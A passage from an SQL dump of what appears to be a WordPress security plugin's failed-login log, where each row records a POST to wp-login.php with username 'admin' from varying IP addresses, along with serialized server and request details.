REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746884647.335603;s:12:\"REQUEST_TIME\";i:1746884647;}}','198.54.120.4',0,'2025-05-10 19:14:09','1970-01-01 00:00:00'),(95318,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44734\";s:11:\"REMOTE_ADDR\";s:13:\"120.24.23.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746885285.9955549;s:12:\"REQUEST_TIME\";i:1746885285;}}','120.24.23.234',0,'2025-05-10 19:24:47','1970-01-01 00:00:00'),(95319,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33454\";s:11:\"REMOTE_ADDR\";s:12:\"81.88.53.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746885921.596766;s:12:\"REQUEST_TIME\";i:1746885921;}}','81.88.53.143',0,'2025-05-10 19:35:23','1970-01-01 00:00:00'),(95320,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51442\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.109\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746886556.442909;s:12:\"REQUEST_TIME\";i:1746886556;}}','162.0.229.109',0,'2025-05-10 19:45:58','1970-01-01 00:00:00'),(95321,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55960\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.251.71\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746887193.129827;s:12:\"REQUEST_TIME\";i:1746887193;}}','162.213.251.71',0,'2025-05-10 19:56:34','1970-01-01 00:00:00'),(95322,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51930\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.137.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746887828.8470471;s:12:\"REQUEST_TIME\";i:1746887828;}}','66.29.137.63',0,'2025-05-10 20:07:10','1970-01-01 00:00:00'),(95323,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50510\";s:11:\"REMOTE_ADDR\";s:12:\"45.90.72.157\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746888468.769346;s:12:\"REQUEST_TIME\";i:1746888468;}}','45.90.72.157',0,'2025-05-10 20:17:50','1970-01-01 00:00:00'),(95324,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36018\";s:11:\"REMOTE_ADDR\";s:13:\"157.245.6.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746889106.6543169;s:12:\"REQUEST_TIME\";i:1746889106;}}','157.245.6.207',0,'2025-05-10 20:28:28','1970-01-01 00:00:00'),(95325,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35118\";s:11:\"REMOTE_ADDR\";s:15:\"217.182.158.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746889699.349992;s:12:\"REQUEST_TIME\";i:1746889699;}}','217.182.158.226',0,'2025-05-10 20:38:21','1970-01-01 00:00:00'),(95326,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47376\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.104.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746890321.4668641;s:12:\"REQUEST_TIME\";i:1746890321;}}','134.209.104.76',0,'2025-05-10 20:48:43','1970-01-01 00:00:00'),(95327,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54990\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746890957.868701;s:12:\"REQUEST_TIME\";i:1746890957;}}','91.151.95.70',0,'2025-05-10 20:59:19','1970-01-01 00:00:00'),(95328,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 